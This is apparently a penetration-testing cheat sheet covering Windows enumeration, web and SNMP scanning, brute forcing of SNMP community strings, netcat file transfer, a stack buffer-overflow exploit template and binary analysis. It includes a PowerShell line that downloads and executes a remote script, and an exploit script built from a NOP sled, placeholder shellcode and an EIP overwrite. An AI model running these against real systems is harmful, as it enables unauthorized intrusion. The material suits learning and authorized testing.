learnsecurely/pentest-cheat-sheet

pentest-cheat-sheet

Windows

Download and execute powershell enumeration script

PS C:\> IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1')

Web

gobuster

# Find interesting URLs (gobuster 2.x syntax; gobuster 3.x takes the same flags after the "dir" subcommand)
gobuster -e \
         -w /usr/share/wordlists/dirb/common.txt \
         -t 20 \
         -u <target_url>

nikto

# Scan for web vulnerabilities
$ nikto -h <url>

SNMP

<version> is 1 or 2c

Install/enable MIBs

# Install a bunch of MIBs
$ sudo apt-get install snmp-mibs-downloader

# Edit snmp.conf to enable MIB translation (comment out the "mibs :" line)
$ sudo vim /etc/snmp/snmp.conf

onesixtyone

# Try each community string in the dictionary against the host
$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>

snmpcheck

TODO

snmpwalk

$ snmpwalk -v<version> -c <community> <ip>

enyx

$ python enyx.py <version> <community> <ip>

nmap

# Scan SNMP using default nmap scripts
$ nmap -sU \
       -sC \
       -p 161 \
       -n \
       -oA nmap-udp-snmp-default \
       <ip>

# Brute force the SNMP community string using nmap
$ nmap -sU \
       -sC \
       -p 161 \
       -n \
       --script snmp-brute \
       --script-args snmp-brute.communitiesdb=/usr/share/doc/onesixtyone/dict.txt \
       -oA nmap-udp-snmp-brute \
       <ip>

Download a binary using netcat and base64

# On the receiving host (eve), listen and redirect the base64 text to a file
eve$ nc -lvnp 1234 > <binary>.b64

# On the sending host (alice), base64-encode the binary and send it to eve via netcat
alice$ base64 <binary> | nc <eve_ip> 1234

# Decode the binary on eve
eve$ base64 --decode <binary>.b64 > <binary>

# Compare a checksum (e.g. sha256sum) on both hosts to confirm the transfer is intact

Buffer Overflow Example

????

# ???? Checksec a binary
eve$ checksec -f <binary>

Determine pattern offset / buffer size

# Create a 500-character cyclic alphanumeric pattern
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

# Debug the binary using gdb
$ gdb <binary>

# Run the binary with exploit.py's output as its argument
(gdb) r $( python3 exploit.py )

! The above should throw a segfault, followed by a hex address. Use
! this as <hex_address> in the pattern_offset.rb command below.

# Use pattern_offset to determine the offset at which the segfault happens
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <hex_address>

! The output of pattern_offset above is the buffer size (BUF_SIZE) used below

Create exploit script

# Use a bash heredoc to create exploit.py. The quoted 'EOF' keeps bash from
# expanding $( ... ) inside the script. Alternatively, copy the contents
# and paste them into an editor.
$ cat << 'EOF' > exploit.py
#!/usr/bin/env python3
import sys

# Example (potential) usage:
#   # Run exploit.py in a subshell and pass its output to the vulnerable binary
#   bob$ <binary> $( python3 exploit.py )

# The buffer size is the offset reported by the pattern_offset command above
BUF_SIZE = <buffer_size>

# Grab shellcode from some place like Packet Storm and place it here as bytes
SHELL_CODE = b"<shell_code>"

# Subtract the length of the shellcode from the buffer/offset size and
# generate that many NOP bytes (0x90) to fill the rest of the buffer
NOP_SLED = b"\x90" * (BUF_SIZE - len(SHELL_CODE))

# EIP is found using the section titled "Determine probable EIP value" and
# looks like "0xdeadbeef". It must be written as little-endian bytes: take
# the last two hex digits (ef) and prefix them with "\x" to get "\xef", then
# the previous two (be) to get "\xef\xbe", and so on, until 0xdeadbeef
# becomes b"\xef\xbe\xad\xde".
#
# Repeat that with the <eip_hex_address> you found by following the section
# titled "Determine probable EIP value" and place the result in the EIP var:
EIP = b"<eip_address>"

# Finally, write the raw payload to stdout (no trailing newline)
sys.stdout.buffer.write(NOP_SLED + SHELL_CODE + EIP)
EOF
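The two conversions the comments above rely on, turning the segfault address into a pattern offset and writing an address as little-endian bytes, as an added Python example that is not part of the cheat sheet and not Metasploit's code: it reimplements the pattern_create/pattern_offset logic so the relation between the crash value and the offset is visible. The crash values used are constructed.

```python
import itertools
import string
import struct

# pattern_create.rb's sequence: 3-char chunks of Upper+lower+digit with the
# digit cycling fastest ("Aa0Aa1Aa2...Aa9Ab0..."), 20280 chars before repeating.
def pattern_create(length):
    if length > 20280:
        raise ValueError("pattern repeats after 20280 characters")
    chunks = itertools.product(string.ascii_uppercase,
                               string.ascii_lowercase, string.digits)
    out = []
    while len(out) * 3 < length:
        out.append("".join(next(chunks)))
    return "".join(out)[:length]

def le_bytes(address, width=4):
    """Pack an address the way it sits in memory on x86/x86-64: little-endian."""
    return struct.pack("<I" if width == 4 else "<Q", address)

def le_escape(address, width=4):
    r"""Render the little-endian bytes in the "\xef\xbe\xad\xde" form the
    EIP variable in exploit.py expects."""
    return "".join("\\x%02x" % b for b in le_bytes(address, width))

def pattern_offset(crash_value, length=8192, width=4):
    """What pattern_offset.rb -q does: the register held `width` bytes of the
    pattern, which gdb shows as a little-endian integer; find those bytes in
    the pattern. Returns -1 when the value does not come from the pattern
    (e.g. the register was not fully overwritten or the crash is elsewhere)."""
    needle = le_bytes(crash_value, width).decode("latin-1")
    return pattern_create(length).find(needle)

if __name__ == "__main__":
    # Constructed values, not taken from a real crash
    print(pattern_create(20))          # Aa0Aa1Aa2Aa3Aa4Aa5Aa
    print(pattern_offset(0x41366141))  # 18  (bytes "Aa6A" sit at offset 18)
    print(le_escape(0xdeadbeef))       # \xef\xbe\xad\xde
```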

Determine probable EIP value

# Run the exploit script
(gdb) r $( python3 exploit.py )

# Dump 100 4-byte words starting at $esp
(gdb) x/100x $esp

# Dump 100 4-byte words starting 500 bytes before $esp
(gdb) x/100x $esp-500

# Hit <enter> to keep paging until you see several consecutive lines of NOPs like:
# 0xbffff410: 0x90909090	0x90909090	0x90909090	0x90909090

!! TBD

Linux

How to create a sha512 hash for placing directly into a unix shadow file

# How to generate a sha512 hash suitable for /etc/shadow using Mac OSX
# (the salt is not secret, but use a CSPRNG for it; passlib picks one itself if salt= is omitted)
$ pip install passlib
$ python3 -c "from passlib.hash import sha512_crypt; import getpass, string, secrets; print(sha512_crypt.using(salt=''.join(secrets.choice(string.ascii_letters + string.digits) for _ in range(16)), rounds=5000).hash(getpass.getpass()))"
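Before pasting the result into /etc/shadow it is worth checking that the string is well formed, since a malformed entry locks the account instead of setting a password. An added Python example, not part of the cheat sheet, that validates the `$6$` modular-crypt format and builds the shadow record; the sample hash is constructed and is not a real password hash.

```python
import re
from datetime import date

# sha512_crypt output in modular crypt format: $6$[rounds=N$]<salt>$<hash>
# salt: 1-16 chars, hash: exactly 86 chars, both from the crypt base64 alphabet.
_B64 = "[./0-9A-Za-z]"
_SHA512_CRYPT = re.compile(
    r"^\$6\$(?:rounds=(?P<rounds>\d+)\$)?"
    r"(?P<salt>" + _B64 + r"{1,16})\$(?P<hash>" + _B64 + r"{86})$")

def parse_sha512_crypt(value):
    """Return {"rounds", "salt", "hash"} for a well-formed string, else None.
    A field crypt() cannot parse makes every login attempt fail, so a
    malformed entry silently locks the account rather than setting a password."""
    m = _SHA512_CRYPT.match(value)
    if not m:
        return None
    rounds = int(m.group("rounds")) if m.group("rounds") else 5000
    if not 1000 <= rounds <= 999999999:   # range the sha512_crypt spec accepts
        return None
    return {"rounds": rounds, "salt": m.group("salt"), "hash": m.group("hash")}

def shadow_line(user, value, lastchg=None):
    """Build the /etc/shadow record for `user`: name, hash, last-change day
    (days since 1970-01-01), min 0, max 99999, warn 7, then empty fields."""
    if parse_sha512_crypt(value) is None:
        raise ValueError("malformed sha512_crypt hash for %s" % user)
    if lastchg is None:
        lastchg = (date.today() - date(1970, 1, 1)).days
    return "%s:%s:%d:0:99999:7:::" % (user, value, lastchg)

# Constructed sample: syntactically valid, with a dummy 86-char hash body.
SAMPLE = "$6$" + "Zn2kP9Qw1aBcDeFg" + "$" + "h" * 86

if __name__ == "__main__":
    print(parse_sha512_crypt(SAMPLE))
    print(shadow_line("alice", SAMPLE))
```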

Binary Analysis

Use strace to see system calls

$ strace <binary>

Use Radare2 (r2) to visualize assembly code

$ r2 <binary>

# Start by analyzing all functions
[0x12345678]> aaa

# List all functions
[0x12345678]> afl

# Visualize the functions and flow
[0x12345678]> vvv

# Press down to scroll to the entrypoint, such as main or sym.main

# Press "g" twice to go into entrypoint and prepare ASCII visualization
